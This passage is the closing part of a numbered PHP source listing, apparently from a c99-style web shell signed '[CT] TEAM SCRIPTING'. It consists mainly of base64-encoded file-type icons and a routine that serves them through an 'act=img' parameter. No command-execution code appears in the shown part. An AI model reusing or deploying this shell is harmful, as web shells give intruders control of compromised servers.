  2707. "EzWCgwARADs=",
  2708. "ext_wri"=>
  2709. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2710. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2711. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2712. "ext_xml"=>
  2713. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2714. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2715. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2716. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2717. "IQA7",
  2718. "ext_xsl"=>
  2719. "R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
  2720. "gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2721. "AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
  2722. "SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
  2723. "dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==",
  2724. "1"=>
  2725. "R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe".
  2726. "FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW".
  2727. "GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O".
  2728. "HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe".
  2729. "PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy".
  2730. "FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m".
  2731. "GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA".
  2732. "AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u".
  2733. "rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw".
  2734. "6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD".
  2735. "4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR".
  2736. "ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq".
  2737. "qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7",
  2738. "2"=>
  2739. "R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB".
  2740. "HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU".
  2741. "CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2742. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ".
  2743. "aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ".
  2744. "iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE".
  2745. "xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls".
  2746. "/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=",
  2747. "3"=>
  2748. "R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV".
  2749. "Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE".
  2750. "HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK".
  2751. "OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA".
  2752. "KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1".
  2753. "jI2Oj49BADs=",
  2754. "4"=>
  2755. "R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd".
  2756. "X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA".
  2757. "QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt".
  2758. "er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma".
  2759. "m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=",
  2760. "5"=>
  2761. "R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd".
  2762. "IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq".
  2763. "DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix".
  2764. "TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW".
  2765. "CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2766. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2767. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
  2768. "AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
  2769. "ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
  2770. "J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
  2771. "A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
  2772. "ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
  2773. "ri3b8y9NwWyPLo3rlK7JQAA7",
  2774. "font"=>
  2775. "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
  2776. "AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
  2777. "RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
  2778. "RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
  2779. "AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
  2780. "8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
  2781. "SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
  2782. "unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
  2783. "Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
  2784. "epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
  2785. "veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
  2786. "clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
  2787. "dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
  2788. "63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
  2789. "3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
  2790. "KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
  2791. "j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
  2792. "JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
  2793. "f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
  2794. "9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
  2795. "HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
  2796. "5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
  2797. "8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
  2798. "yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
  2799. "ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
  2800. "K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
  2801. "AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
  2802. "S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
  2803. "P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
  2804. "Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
  2805. "8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
  2806. "/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
  2807. "7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
  2808. "u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
  2809. "KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
  2810. "urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
  2811. "3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
  2812. "B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
  2813. "5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
  2814. "MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
  2815. "hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
  2816. "/wDchCA97/3IQhB//9k=",
  2817. "pdisk"=>
  2818. "R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
  2819. "yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
  2820. "V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
  2821. "jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
  2822. "qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
  2823. "Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2824. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2825. "BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
  2826. "BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
  2827. "IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
  2828. "odel"=>
  2829. "R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
  2830. "SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
  2831. );
  2832. $imgequals = array(
  2833. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2834. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
  2835. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
  2836. );
  2837. ksort($arrimg);
  2838. if (!$getall)
  2839. {
  2840. header("Content-type: image/gif");
  2841. header("Cache-control: public");
  2842. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2843. header("Cache-control: max-age=".(60*60*24*7));
  2844. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2845. foreach($imgequals as $k=>$v)
  2846. {
  2847. if (in_array($img,$v)) {$img = $k;}
  2848. }
  2849. if (empty($arrimg[$img])) {$img = "small_unk";}
  2850. if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2851. echo base64_decode($arrimg[$img]);
  2852. }
  2853. else
  2854. {
  2855. echo "<center>";
  2856. $k = array_keys($arrimg);
  2857. foreach ($k as $u)
  2858. {
  2859. echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
  2860. }
  2861. echo "</center>";
  2862. }
  2863. exit;
  2864. }
  2865. if ($act == "about")
  2866. {
  2867. $dàta = "Any stupid copyrights and copylefts";
  2868. echo $data;
  2869. }
  2870. $microtime = round(getmicrotime()-$starttime,4);
  2871. ?>
  2872. <? // [CT] TEAM SCRIPTING - RODNOC ?>

comments powered by Disqus